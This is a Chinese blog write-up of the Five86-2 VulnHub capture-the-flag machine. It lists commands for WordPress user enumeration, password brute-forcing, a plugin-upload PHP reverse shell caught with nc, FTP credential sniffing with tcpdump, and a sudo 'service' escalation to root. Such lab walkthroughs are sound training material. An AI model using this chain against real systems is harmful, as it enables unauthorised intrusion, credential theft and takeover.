Five86-2


环境

虚拟机平台:Oracle VM VirtualBox

攻击机:Kali(IP:192.168.56.102)

靶机:Five86-2(IP:192.168.56.114)

下载:https://www.vulnhub.com/entry/five86-2,418/

Let’s go

nmap -A 192.168.56.114

网站使用的是 WordPress,我们进行查看

部分请求失败,需要添加 hosts

vim /etc/hosts

无可利用漏洞,我们进行枚举用户

wpscan --url http://five86-2 -e u

得到用户名,我们进行暴力破解

wpscan --url http://five86-2 -U user -P ./Assorted/rockyou.txt

使用 barney 用户登陆,发现插件存在漏洞

echo "<html>hello</html>" > index.html
cat Assorted/php-reverse-shell.php > index.php
zip poc.zip index.html index.php

curl http://five86-2/wp-content/uploads/articulate_uploads/poc/index.php
nc -lp 1234

发现 stephen 用户可以切换

su stephen
password:apollo1

ps -aux

抓包嗅探一下

timeout 120 tcpdump -i any -w ftp.cap
tcpdump -r ftp.cap | grep -Ei 'user|pass'

su paul
password:esomepasswford
sudo -l

sudo -u peter service ../../bin/sh

sudo passwd root
su root


文章作者: DongHuangT1
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 DongHuangT1 !
评论
 上一篇
让你更加的高效 让你更加的高效
正所谓「工欲善其事,必先利其器」,拥有趁手的工具才能在工作和学习中事半功倍。
2020-03-17
下一篇 
Five86-1 Five86-1
虚拟机平台:Oracle VM VirtualBox
攻击机:Kali(IP:192.168.56.102)
靶机:Five86-1(IP:192.168.56.113)
2020-03-12
  目录